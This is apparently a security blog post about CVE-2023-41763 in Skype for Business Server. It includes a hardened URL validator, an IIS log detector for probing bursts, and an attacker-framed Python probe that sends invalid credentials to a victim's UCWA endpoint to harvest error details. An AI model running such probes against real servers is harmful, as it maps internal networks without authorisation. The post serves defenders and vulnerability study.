CVE-2023-41763 - Exploiting Skype for Business Elevation of Privilege Vulnerability

In October 2023, Microsoft patched CVE-2023-41763, a vulnerability in Skype for Business Server that was already being exploited when the fix shipped. Microsoft classifies it as an Elevation of Privilege (EoP) flaw, but its direct impact is information disclosure: a specially crafted network call can make the server parse an HTTP request to an arbitrary address, revealing internal IP addresses or port numbers to the attacker (CVSS 5.3, rated Important rather than Critical). In this post we break down what the vulnerability is, how an attacker can probe for it, and look at code examples and references for deeper analysis.

What is CVE-2023-41763?

CVE-2023-41763 affects Skype for Business Server 2015 and 2019; the advisory lists the exact cumulative updates that are affected and the ones that contain the fix. Microsoft has not published the root cause. The weakness lies in how the server handles attacker-controlled input reaching its web services, and this post focuses on the Unified Communications Web API (UCWA) endpoints, the HTTP surface an attacker can reach with a crafted request. If exploited, an attacker learns internal IP addresses and port numbers that are not otherwise exposed to clients.

Microsoft’s Advisory:
Microsoft Security Update Guide - CVE-2023-41763

How Does the Vulnerability Work?

An attacker who can send HTTP requests to the Skype for Business web services can craft a request that causes the server itself to issue an HTTP request to an address of the attacker's choosing. Whether that outbound request succeeds, is refused or times out tells the attacker which internal IP addresses and ports are reachable from the server, information that is normally hidden from clients. On its own this is reconnaissance, but it hands the attacker a map of the internal deployment for follow-on attacks against other services.
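To make the weakness concrete, here is an added Python model of the pattern Microsoft's description points at, a server that issues an HTTP request to an address taken from a client, beside a hardened version. It is illustrative code written for this post, not Skype for Business code; Microsoft has not published the root cause, and the allow-listed hostnames are assumed example values.

```python
import ipaddress
from urllib.parse import urlparse

# Assumption for this example: the deployment's own web-service FQDNs. These are the
# only hosts the server should contact on a client's behalf; everything else is rejected.
ALLOWED_HOSTS = {"lyncweb.contoso.com", "lyncdiscover.contoso.com"}


def vulnerable_target(href: str) -> str:
    """Vulnerable pattern: hand the client-supplied address straight to the HTTP client.

    Whether the outbound request succeeds, times out or is refused, the attacker learns
    which internal addresses and ports answer, which is the disclosure Microsoft describes.
    """
    return href


def is_internal_ip(host: str) -> bool:
    """True when host is an IP literal in a range a client-driven request must never reach."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not an IP literal; the allow list decides
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_target(href: str) -> bool:
    """Hardened pattern: only https, only port 443, only allow-listed hosts, never internal IPs.

    The allow list is the primary control; the IP check is defence in depth so that a
    later, looser allow list cannot quietly reintroduce access to internal ranges.
    """
    try:
        parsed = urlparse(href)
        port = parsed.port  # raises ValueError on a malformed port such as ":abc"
    except ValueError:
        return False
    if parsed.scheme.lower() != "https":
        return False
    if port not in (None, 443):
        return False
    host = parsed.hostname  # strips userinfo, so "trusted.host@10.0.0.5" yields 10.0.0.5
    if not host or is_internal_ip(host):
        return False
    return host.lower() in ALLOWED_HOSTS


def safe_target(href: str) -> str:
    """Return href if it passes validation, otherwise refuse to build the request at all."""
    if not validate_target(href):
        raise ValueError(f"refusing outbound request to {href!r}")
    return href


if __name__ == "__main__":
    # Constructed inputs: the legitimate web service, and a probe aimed at an internal host
    for candidate in ("https://lyncweb.contoso.com/ucwa/oauth/v1/applications",
                      "https://lyncweb.contoso.com@10.0.0.5:443/"):
        print(candidate, "->", "allowed" if validate_target(candidate) else "rejected")
```

The second constructed input shows why the check runs on `parsed.hostname` rather than on the raw string: the allow-listed name appears in the URL, but it is userinfo, and the host the server would actually connect to is the internal address after the `@`.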

Step 1: Locate the UCWA Endpoints

A client finds the web services through Autodiscover (https://lyncdiscover.<domain>/), which returns links to the pool's web-services FQDN. The two endpoints relevant here are the OAuth token service

https://<skype-server>/WebTicket/oauthtoken

and the UCWA applications resource, which a client creates once it holds a token

https://<skype-server>/ucwa/oauth/v1/applications

Step 2: Send a Malicious Request

Below is a sample Python script showing how an attacker might probe the endpoint with a crafted HTTP request. It is a reconnaissance probe of the endpoint's error handling; it does not by itself trigger CVE-2023-41763.

import requests
import urllib3

# Silence the InsecureRequestWarning that verify=False triggers on every request
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# The UCWA applications resource. A legitimate client first obtains a token from
# /WebTicket/oauthtoken and then POSTs here with an Authorization: Bearer header,
# so an unauthenticated probe is expected to draw a 401 with a WWW-Authenticate challenge
url = "https://victim-skype-server/ucwa/oauth/v1/applications"
headers = {
    "Accept": "application/json",
    "Content-Type": "application/json",
}

# The body mimics a password-grant authentication request with a deliberately
# invalid password; the point is to observe how the server answers, not to log in
payload = {
    "grant_type": "password",
    "username": "target_user",
    "password": "invalid_password",
}

# verify=False skips certificate checks (internal front ends often use a private CA);
# the timeout keeps an automated probe from hanging on a filtered port
response = requests.post(url, json=payload, headers=headers, verify=False, timeout=10)
print(response.status_code)
print(response.headers.get("WWW-Authenticate"))  # challenge names the token service and grant types
print(response.text)  # error body may reveal internal hostnames or service URIs

Danger: Using deliberately invalid but well-formed credentials, the attacker observes the server's response. The status code, the WWW-Authenticate challenge and any error body can reveal internal hostnames and service URIs. Much of that is normal protocol behaviour even on a patched server, so the probe is reconnaissance rather than proof of the vulnerability; the sensitive disclosure in CVE-2023-41763 itself is the internal IP addresses and port numbers Microsoft describes.

Real-World Impact

An attacker with access to the corporate network, or to an Internet-facing Skype for Business front end, can automate probes against the server. If the server is unpatched, Microsoft's advisory states that a crafted request can disclose internal IP addresses and port numbers, exactly the information needed to pivot from the collaboration platform to other internal services. Patch status, not the result of a probe, is the reliable indicator: check the installed cumulative update against the advisory.
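Monitoring for this kind of probing is something defenders can do today. The following is an added example, not part of the original post or any Microsoft tooling: it parses IIS W3C logs from a front-end server and flags client IPs that generate a burst of rejected requests to the UCWA and WebTicket paths. The log records, IP addresses and user agents are constructed for the example; the watched paths, threshold and window are assumptions to tune for your deployment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Paths on a Skype for Business front end that a probing tool will hammer (assumed list)
WATCHED_PREFIXES = ("/webticket/oauthtoken", "/ucwa/", "/autodiscover/")
# Responses that mean the request was rejected rather than served
FAILURE_STATUSES = {400, 401, 403, 404}

# Constructed IIS W3C extended log (not from a real server). IIS writes one space-separated
# record per request and replaces spaces inside field values with '+'.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-10-11 09:00:01 10.0.0.5 GET /Autodiscover/AutodiscoverService.svc/root - 443 - 10.0.4.20 Lync/16.0 - 200 0 0 15
2023-10-11 09:00:02 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.4.20 Lync/16.0 - 401 0 0 20
2023-10-11 09:00:09 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.4.20 Lync/16.0 - 200 0 0 120
2023-10-11 09:00:10 10.0.0.5 POST /ucwa/oauth/v1/applications - 443 - 10.0.4.20 Lync/16.0 - 201 0 0 45
2023-10-11 09:05:00 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.9.77 python-requests/2.31.0 - 401 0 0 30
2023-10-11 09:05:01 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.9.77 python-requests/2.31.0 - 401 0 0 28
2023-10-11 09:05:02 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.9.77 python-requests/2.31.0 - 401 0 0 31
2023-10-11 09:05:03 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.9.77 python-requests/2.31.0 - 401 0 0 29
2023-10-11 09:05:04 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.9.77 python-requests/2.31.0 - 401 0 0 30
2023-10-11 09:05:05 10.0.0.5 POST /ucwa/oauth/v1/applications - 443 - 10.0.9.77 python-requests/2.31.0 - 401 0 0 12
2023-10-11 09:10:00 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.9.78 Lync/16.0 - 401 0 0 22
2023-10-11 09:15:00 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.9.78 Lync/16.0 - 401 0 0 21
2023-10-11 09:20:00 10.0.0.5 POST /WebTicket/oauthtoken - 443 - 10.0.9.78 Lync/16.0 - 401 0 0 23
"""


def parse_iis_log(text):
    """Yield one dict per request record, naming columns from the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        if fields is None:
            raise ValueError("request record before any #Fields directive")
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # truncated or corrupted record; skip rather than misalign columns
        yield dict(zip(fields, parts))


def find_probe_sources(text, threshold=5, window_seconds=60):
    """Return {client_ip: burst_size} for clients with >= threshold rejected requests to
    watched paths inside any sliding window of window_seconds."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(list)
    for rec in parse_iis_log(text):
        if not rec["cs-uri-stem"].lower().startswith(WATCHED_PREFIXES):
            continue
        if int(rec["sc-status"]) not in FAILURE_STATUSES:
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        failures[rec["c-ip"]].append(ts)

    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1  # drop failures that have fallen out of the window
            burst = end - start + 1
            if burst >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), burst)
    return flagged


if __name__ == "__main__":
    for ip, burst in find_probe_sources(SAMPLE_LOG).items():
        print(f"{ip}: {burst} rejected requests to watched endpoints within 60 s")
```

In the constructed log, the real client at 10.0.4.20 mistypes a password once and then authenticates, which stays below the threshold, while 10.0.9.77 fires six rejected requests in five seconds and is flagged. The client at 10.0.9.78 fails once every five minutes and is only flagged if the window is widened, which is the trade-off to make deliberately when tuning.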

References

- Microsoft Security Guidance for CVE-2023-41763
- NVD - CVE-2023-41763
- Microsoft Security Blog - October 2023 updates
- UCWA documentation

Conclusion

CVE-2023-41763 is a reminder that an information-disclosure bug in collaboration software like Skype for Business Server can be worth exploiting in the wild even at a moderate CVSS score, because the internal addresses it leaks feed the next stage of an attack. Attackers can use seemingly harmless endpoints to map a deployment they could not otherwise see. Protect your network by applying the October 2023 cumulative updates promptly and by monitoring requests to the web-service endpoints discussed above.

If you manage Skype for Business servers, take action now—your organization’s security depends on it.

Timeline

Published on: 10/10/2023 18:15:18 UTC
Last modified on: 10/12/2023 22:18:56 UTC